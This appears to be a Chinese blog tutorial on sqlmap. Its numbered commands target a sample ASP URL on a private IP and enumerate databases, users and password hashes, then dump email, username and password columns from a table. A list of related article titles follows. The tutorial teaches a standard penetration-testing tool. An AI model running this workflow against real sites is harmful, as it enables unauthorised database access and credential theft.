一、指定注入点

-u:指定注入点url
需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs

参数:–dbs:dbs前面有两条杠,请看清楚。
三、web当前使用的数据库

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

四、web数据库使用账户

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user

五、列出sqlserver所有用户

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

六、数据库账户与密码

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

七、列出数据库中的表

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

参数:
-D:指定数据库名称
–tables:列出表

八、列出表中字段

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns

参数:
-D:指定数据库名称
-T:指定要列出字段的表
–columns:指定列出字段

九、暴字段内容

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

参数:
-C :指定要暴的字段
–dump:将结果导出
如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

–start:指定开始的行

–stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

sql注入之——sqlmap教程相关推荐

  1. 详解强大的SQL注入工具——SQLMAP

    本文转自:详解强大的SQL注入工具--SQLMAP 前言 Windows下的注入工具好的又贵,免费的啊D.明小子等又不好用,我们根本没必要花 时间去找什么破解的havij.pangolin什么的,特别 ...

  2. 渗透测试-SQL注入之sqlmap的使用方法及实战案例

    SQL注入之sqlmap的使用方法及实战案例 文章目录 SQL注入之sqlmap的使用方法及实战案例 前言 一.sqlmap的使用方法 查库,表,列,以及相关的字段的信息 万能密码汇总 判断是否为字符 ...

  3. 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用

    SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...

  4. SQL注入之sqlmap入门教程

    目录 一.判断是否存在注入点 二.查询当前用户下所有数据库 三.获取数据库中的表名 四.获取表中的字段名 五.获取字段内容 六.获取数据库的所有用户 七.获取数据库用户的密码 八.获取当前网站数据库的 ...

  5. sql注入之——SQLMap常见语句

    填坑~~ SQLMap常见语句 首先要明确 整个的单词 需要用两个横杠– 缩写的单词 需要一个横杠- 参考:https://www.freebuf.com/sectool/164608.html 一. ...

  6. B站小迪安全笔记第十九天-SQL注入之sqlmap绕过waf

    前言: 在攻防实战中,往往需要掌握一些特性,比如服务器.数据库.应用层.WAF层等,以便我们更灵活地去构造 Payload,从而可以和各种 WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用. 演示案 ...

  7. Sql注入的入门教程

    Sql注入比较常见的漏洞之一,例用程序员的漏洞来进行无账号的登陆,篡改数据库.任何客户端可控,传参数到服务端的变量,和数据库交互,都有可能存在sql注入 原理 用户通过构造sql语句来模仿服务器发向服 ...

  8. 自动化SQL注入工具-sqlmap

    1.通过burpsuite.获取拦截到的请求,指定文件进行探测 python sqlmap.py -r target.txt --current-db 2.通过url地址进行探测 Python sql ...

  9. sql 注入神器sqlmap 源码分析之调试sqlmap

    为什么80%的码农都做不了架构师?>>>    相信大家平时 用sqlmap 命令,比如 python sqlmap.py -u"https://team.oschina. ...

  10. 【无标题】【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了

    一.sqlmap简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入.目前支持的数据库有MySql.Oracle.Access.PostageSQL. ...

最新文章

  1. 用 PHP 和 MySQL 保存和输出图片
  2. 工业交换机与工业路由器的区别
  3. 属于计算机病毒主要特征的是,[单选] 不属于计算机病毒的主要特征的是()
  4. Centos下安装Gcc和Qt
  5. 小程序-读取视频数据 每个N帧采样保存
  6. html文件如何转php文件,怎么把动态的php文件转换成静态的html文件,html文件是php文件…...
  7. lol人物模型提取(四)
  8. 百度开源呼叫中心系统
  9. Linux在sudo apt-get update或install时出现archive.ubuntu.com连接失败 [IP: 91.189.91.39 80]的错误解决方案
  10. 苹果v10模板需要几的php,苹果MACCMSv10源码模板安装常见问题
  11. FPGA学习笔记2.1——用Verilog实现74LS148的功能定义并测试
  12. 使用opencv的透视变换裁剪倾斜人脸
  13. 在第一次使用德国小鸡要注意的地方
  14. 使用烧杯进行缓存? 为什么要切换到dogpile.cache
  15. 华为鸿蒙升级表,华为鸿蒙手机升级计划表出炉!按麒麟芯片型号适配:你有份吗?...
  16. 远程桌面未找到远程计算机服务,电脑无法远程连接怎么办
  17. 北大青鸟深圳嘉华学校分享Hibernate查询
  18. linux的cuda10卸载,Ubuntu18.04下卸载CUDA11.0
  19. new ext.toolbar控制按钮间距_消防设施常见安装间距汇总
  20. 微软的东西,你不要删.否则学我的,重装系统.

热门文章

  1. spring4.0.0的配置和使用
  2. 前端开发面试题-JavaScript(一)
  3. 我的css reset
  4. 三言两语聊Python模块–文档测试模块doctest
  5. 安装无线网卡后,显示网络电缆被拔出?
  6. Python向数据库表格里插入万级数据
  7. C++对ascii文件按行和分隔符读取并显示
  8. 监测系统的cpu,物理内存,磁盘的使用
  9. 怎么获取php内的参数,php如何获取方法内的所有参数
  10. #ifndef HeaderName_h #define HeaderName_h #endif 使用详解